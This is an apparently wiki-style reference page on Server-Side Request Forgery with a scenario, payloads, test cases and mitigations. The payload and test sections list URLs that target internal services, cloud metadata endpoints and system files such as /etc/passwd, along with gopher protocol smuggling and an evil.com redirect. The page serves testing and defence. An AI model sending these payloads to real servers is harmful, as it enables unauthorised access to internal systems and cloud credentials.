SSRF
Description: Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external network resources on behalf of the server. This can lead to unauthorized access to internal services, data exfiltration, and potential network enumeration.
Example with Scenario:
Imagine a web application that fetches user-supplied URLs to display a thumbnail of the website. If the application does not validate the URL properly, an attacker can provide a URL pointing to an internal service, such as http://localhost/admin
, allowing the attacker to access internal resources.
Payloads:
Access Internal Services:
http://localhost/admin http://127.0.0.1/admin http://internal-service.local/admin
Access Metadata Services (Cloud environments):
http://169.254.169.254/latest/meta-data/ http://169.254.169.254/computeMetadata/v1/
Open Redirect Exploitation:
http://example.com/?url=http://evil.com
File Inclusion:
file:///etc/passwd file:///C:/Windows/system32/drivers/etc/hosts
Protocol Smuggling:
gopher://localhost:11211/_stats ftp://ftp.example.com/file.txt
DNS Rebinding:
http://malicious.com (which resolves to an internal IP after initial DNS resolution)
Test Cases:
Basic Internal Access:
http://localhost:80 http://127.0.0.1:8080
Private IP Ranges:
http://192.168.1.1:80 http://10.0.0.1:8080
Accessing Metadata Services:
http://169.254.169.254/latest/meta-data/
File Access:
file:///etc/passwd file:///C:/Windows/System32/drivers/etc/hosts
Alternative Protocols:
ftp://example.com/file.txt gopher://localhost:11211/_stats
Custom Headers:
http://example.com -H 'Host: internal-service.local'
Mitigation:
Input Validation and Whitelisting:
Validate and sanitize user inputs. Only allow URLs that match a strict whitelist of allowed domains and protocols.
Disable Unnecessary Protocols:
Restrict the application from using protocols other than HTTP/HTTPS.
Network Segmentation:
Ensure the server cannot access internal services or sensitive resources directly.
Metadata Service Protection:
In cloud environments, limit access to metadata services through firewall rules or IAM roles.
Use a URL Parsing Library:
Use a robust URL parsing library to handle URL validation and prevent bypasses using encoding or other tricks.
Timeouts and Retries:
Implement timeouts and retry limits on server-side requests to avoid exploitation of long-running requests.
Monitor and Alert:
Set up monitoring and alerting for unusual server-side request patterns.
Last updated